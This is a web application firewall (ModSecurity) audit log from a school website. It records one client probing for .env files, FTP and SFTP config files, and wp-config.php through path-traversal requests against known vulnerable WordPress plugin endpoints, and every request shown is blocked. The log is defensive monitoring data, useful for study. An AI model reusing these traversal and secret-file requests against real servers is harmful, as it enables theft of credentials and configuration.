X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --af574005-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af574005-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069934171514 653 (- - -) Stopwatch2: 1746069934171514 653; combined=239, p1=209, p2=0, p3=0, p4=0, p5=30, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af574005-Z-- --4d842e29-A-- [01/May/2025:10:25:34 +0700] aBLprsVMAgMJpNzaVtKqegAAAFI 103.236.140.4 49272 103.236.140.4 8181 --4d842e29-B-- GET /admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4d842e29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d842e29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069934373450 736 (- - -) Stopwatch2: 1746069934373450 736; combined=288, p1=253, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d842e29-Z-- --b8e07c5a-A-- [01/May/2025:10:25:34 +0700] aBLprigtr0Qsi1mFAsMIXAAAAJI 103.236.140.4 49282 103.236.140.4 8181 --b8e07c5a-B-- GET /laravel/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --b8e07c5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8e07c5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069934574349 814 (- - -) Stopwatch2: 1746069934574349 814; combined=294, p1=264, p2=0, p3=0, p4=0, p5=30, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8e07c5a-Z-- --a34c0b57-A-- [01/May/2025:10:25:34 +0700] aBLpruVeTgVPHjrSAYAMLwAAABA 103.236.140.4 49292 103.236.140.4 8181 --a34c0b57-B-- GET /ci4/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a34c0b57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a34c0b57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069934775034 784 (- - -) Stopwatch2: 1746069934775034 784; combined=308, p1=264, p2=0, p3=0, p4=0, p5=44, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a34c0b57-Z-- --5f906e15-A-- [01/May/2025:10:25:34 +0700] aBLprsVMAgMJpNzaVtKqgAAAAEo 103.236.140.4 49310 103.236.140.4 8181 --5f906e15-B-- GET /backup/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --5f906e15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f906e15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069934975310 771 (- - -) Stopwatch2: 1746069934975310 771; combined=290, p1=254, p2=0, p3=0, p4=0, p5=35, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f906e15-Z-- --617a8c6b-A-- [01/May/2025:10:25:35 +0700] aBLpr8VMAgMJpNzaVtKqgwAAAEM 103.236.140.4 49320 103.236.140.4 8181 --617a8c6b-B-- GET /frontend/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --617a8c6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --617a8c6b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069935175856 713 (- - -) Stopwatch2: 1746069935175856 713; combined=223, p1=196, p2=0, p3=0, p4=0, p5=27, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --617a8c6b-Z-- --f5c68120-A-- [01/May/2025:10:25:35 +0700] aBLprygtr0Qsi1mFAsMIXQAAAJQ 103.236.140.4 49330 103.236.140.4 8181 --f5c68120-B-- GET /old/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --f5c68120-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5c68120-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069935375295 733 (- - -) Stopwatch2: 1746069935375295 733; combined=250, p1=220, p2=0, p3=0, p4=0, p5=30, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5c68120-Z-- --bf9bbd5b-A-- [01/May/2025:10:25:35 +0700] aBLpr4144kZ4LAGlEgzxiQAAAMc 103.236.140.4 49340 103.236.140.4 8181 --bf9bbd5b-B-- GET /dev/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --bf9bbd5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf9bbd5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069935574884 845 (- - -) Stopwatch2: 1746069935574884 845; combined=280, p1=243, p2=0, p3=0, p4=0, p5=36, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf9bbd5b-Z-- --9c2c2a24-A-- [01/May/2025:10:25:35 +0700] aBLprygtr0Qsi1mFAsMIYAAAAJY 103.236.140.4 49350 103.236.140.4 8181 --9c2c2a24-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --9c2c2a24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c2c2a24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069935775227 798 (- - -) Stopwatch2: 1746069935775227 798; combined=255, p1=224, p2=0, p3=0, p4=0, p5=31, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c2c2a24-Z-- --8fbb1009-A-- [01/May/2025:10:25:35 +0700] aBLpr4144kZ4LAGlEgzxiwAAAME 103.236.140.4 49364 103.236.140.4 8181 --8fbb1009-B-- GET /public/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --8fbb1009-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fbb1009-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069935975868 856 (- - -) Stopwatch2: 1746069935975868 856; combined=306, p1=268, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fbb1009-Z-- --dd6b1973-A-- [01/May/2025:10:25:55 +0700] aBLpw8VMAgMJpNzaVtKqzQAAAEo 103.236.140.4 50248 103.236.140.4 8181 --dd6b1973-B-- GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --dd6b1973-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd6b1973-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069955269838 820 (- - -) Stopwatch2: 1746069955269838 820; combined=267, p1=240, p2=0, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd6b1973-Z-- --ab120268-A-- [01/May/2025:10:25:55 +0700] aBLpw8VMAgMJpNzaVtKq0AAAAEI 103.236.140.4 50258 103.236.140.4 8181 --ab120268-B-- GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --ab120268-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab120268-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069955471495 683 (- - -) Stopwatch2: 1746069955471495 683; combined=259, p1=233, p2=0, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab120268-Z-- --a3386c49-A-- [01/May/2025:10:25:55 +0700] aBLpw-VeTgVPHjrSAYAMXgAAABU 103.236.140.4 50270 103.236.140.4 8181 --a3386c49-B-- GET /force-download.php?file=wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a3386c49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3386c49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069955671971 722 (- - -) Stopwatch2: 1746069955671971 722; combined=279, p1=235, p2=0, p3=0, p4=0, p5=44, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3386c49-Z-- --9c07097a-A-- [01/May/2025:10:25:55 +0700] aBLpw8VMAgMJpNzaVtKq1AAAAE0 103.236.140.4 50280 103.236.140.4 8181 --9c07097a-B-- GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --9c07097a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c07097a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069955871897 805 (- - -) Stopwatch2: 1746069955871897 805; combined=293, p1=258, p2=0, p3=0, p4=0, p5=34, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c07097a-Z-- --d578dd06-A-- [01/May/2025:10:25:56 +0700] aBLpxOVeTgVPHjrSAYAMYAAAABg 103.236.140.4 50294 103.236.140.4 8181 --d578dd06-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --d578dd06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d578dd06-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069956072399 922 (- - -) Stopwatch2: 1746069956072399 922; combined=346, p1=305, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d578dd06-Z-- --0ac11605-A-- [01/May/2025:10:26:02 +0700] aBLpyo144kZ4LAGlEgzx6wAAAMw 103.236.140.4 50602 103.236.140.4 8181 --0ac11605-B-- GET /.vscode/sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --0ac11605-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ac11605-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069962704228 804 (- - -) Stopwatch2: 1746069962704228 804; combined=333, p1=299, p2=0, p3=0, p4=0, p5=34, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ac11605-Z-- --bf6fc11a-A-- [01/May/2025:10:26:02 +0700] aBLpysVMAgMJpNzaVtKq6AAAAFY 103.236.140.4 50612 103.236.140.4 8181 --bf6fc11a-B-- GET /resources/sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --bf6fc11a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf6fc11a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069962905007 934 (- - -) Stopwatch2: 1746069962905007 934; combined=369, p1=321, p2=0, p3=0, p4=0, p5=47, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf6fc11a-Z-- --8fcb7170-A-- [01/May/2025:10:26:03 +0700] aBLpy-VeTgVPHjrSAYAMbQAAAAg 103.236.140.4 50656 103.236.140.4 8181 --8fcb7170-B-- GET /ftp.config HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --8fcb7170-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fcb7170-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file 